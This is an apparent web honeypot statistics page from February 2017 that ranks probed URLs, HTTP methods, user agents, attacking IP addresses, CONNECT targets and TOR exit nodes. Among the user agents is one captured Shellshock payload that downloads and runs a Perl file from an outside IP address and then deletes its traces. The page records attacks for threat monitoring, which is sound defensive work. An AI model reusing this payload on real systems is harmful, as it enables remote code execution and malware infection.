Honeypot WEB

This page is updated daily. Last update: 2017-02-22 23:03:03 UTC

All User-Agent (txt)   All request and vulnerabilities  

Requests | Method | Status code | User agent | IP address | IP/requests | Connect requests | No standard method | TOR exit node

Top Request


Request Vulnerability Info Rate
/Genericinfo50.5%
/82172316237Genericinfo18.8%
/HNAP1/Linksys routersinfo1.9%
/rom-0ZTE, TP-Link, ZynOS routers...info1.5%
/robots.txtGenericinfo1.5%
/phpMyAdmin/scripts/setup.phpphpMyAdmininfo1.0%
//phpmyadmin/scripts/setup.phpphpMyAdmininfo0.8%
/command.phpGenericinfo0.7%
/myadmin/scripts/setup.phpphpMyAdmininfo0.7%
//myadmin/scripts/setup.phpphpMyAdmininfo0.6%
/cgi/common.cgiGeneric CGIinfo0.6%
/stssys.htmTRENDnetinfo0.6%
http://www.baidu.com/scan for open web proxyinfo0.5%
/hndUnblock.cgiLinksys E-series routersinfo0.5%
http://testp3.pospr.waw.pl/testproxy.phpscan for open web proxyinfo0.5%

Top Method


Method Rate
GET90.5%
HEAD6.9%
POST1.9%
CONNECT0.4%
OPTIONS0.0%
IULD0.0%
PROPFIND0.0%
GET JBoss By0.0%
USER test +iw test :Test0.0%

Top Status code


Status code Rate
20060.4%
40436.2%
4032.3%
4000.9%
3010.1%
4050.0%
5010.0%

Top User agent


User agent Rate
-37.1%
Mozilla18.8%
Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; A1-810 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.305.3%
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)5.2%
Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.14.3%
Wget(linux)3.8%
Mozilla/5.0 Jorgee1.8%
Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.71.6%
Mozilla/4.0 (compatible; Synapse)1.6%
curl/7.17.1 (mips-unknown-linux-gnu) libcurl/7.17.1 OpenSSL/0.9.8i zlib/1.2.31.6%
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)1.5%
masscan/1.0 (https://github.com/robertdavidgraham/masscan)1.5%
Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.01.4%
ZmEu1.3%
() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"crontab -r ; killall -9 perl ; cd /tmp/ ; mkdir temp.old ; cd /tmp/temp.old ; wget http://31.184.194.100/path-old ; perl path-old ; lwp-download http://31.184.194.100/path-old ; fetch http://31.184.194.100/path-old ; curl -O http://31.184.194.100/path-old ; perl path-old;cd /tmp/;rm -rf temp.old\");'1.2%

Top IP address


IP address AS AS Org Country Rate
139.59.161.152202109DIGITALOCEAN-ASN-2 , GBGB19.8%
5.39.218.20157043HOSTKEY-AS , NLNL18.8%
62.210.31.7312876AS12876 , FRFR2.8%
193.109.69.257043HOSTKEY-AS , NLRU2.6%
212.47.238.14912876AS12876 , FRFR2.4%
5.39.222.13957043HOSTKEY-AS , NLNL2.0%
178.18.249.14931147INLINE-AS , DEDE1.8%
31.184.195.11444050PIN-AS , RURU1.3%
207.107.157.206812ROGERS-CABLE Rogers Cable Communications Inc., CACA0.9%
91.196.50.33198414BIZNESHOST-AS , PLPL0.7%
93.174.93.22229073QUASINETWORKS , NLNL0.6%
123.151.42.6117638CHINATELECOM-TJ-AS-AP ASN for TIANJIN Provincial Net of CT, CNCN0.5%
104.236.237.2393406DIGITALOCEAN-ASN-NY3 Digital Ocean, Inc., USUS0.4%
64.137.232.20755053COLOWAREHOUSEONTARIO 2267921 ONTARIO LTD, CACA0.4%
93.158.200.11750673SERVERIUS-AS , NLNL0.4%

Top IP/requests


IP address Request Rate
139.59.161.152/19.8%
5.39.218.201/8217231623718.8%
62.210.31.73/2.8%
193.109.69.2/2.6%
5.39.222.139/2.0%
123.151.42.61http://www.baidu.com/0.5%
177.66.48.158/0.3%
62.210.27.34/0.3%
190.42.184.90/0.2%
94.41.43.185/rom-00.2%
46.191.178.122/rom-00.2%
185.6.154.80/0.2%
136.169.150.67/rom-00.2%
46.191.159.242/rom-00.2%
213.128.81.66/0.2%

Top CONNECT requests


Request Rate
85.94.204.153:3120432.1%
163mx00.mxmail.netease.com:2521.6%
163mx03.mxmail.netease.com:2516.0%
94.23.108.48:66678.8%
126mx00.mxmail.netease.com:257.2%
163mx02.mxmail.netease.com:255.9%
85.25.223.238:802.9%
163mx01.mxmail.netease.com:251.9%
httpbin.org:4431.6%
vip163mx00.mxmail.netease.com:251.3%
vip163mx01.mxmail.netease.com:250.3%

Top no standard method


Method Rate
USER test +iw test :Test77.4%
GET JBoss By19.3%
IULD3.2%

Top TOR exit node


IP address AS AS Org Country
171.25.193.235198093DFRI-AS , SESE
80.67.172.16220766GITOYEN-MAIN-AS The main Autonomous System of Gitoyen (Paris, France)....FR
212.21.66.644716DHOSTING-NET , DEDE
163.172.214.7612876AS12876 , FRGB